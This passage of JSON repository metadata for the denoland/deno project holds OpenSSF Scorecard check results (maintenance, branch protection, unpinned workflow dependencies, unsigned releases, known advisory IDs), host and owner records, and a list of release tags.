"commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosy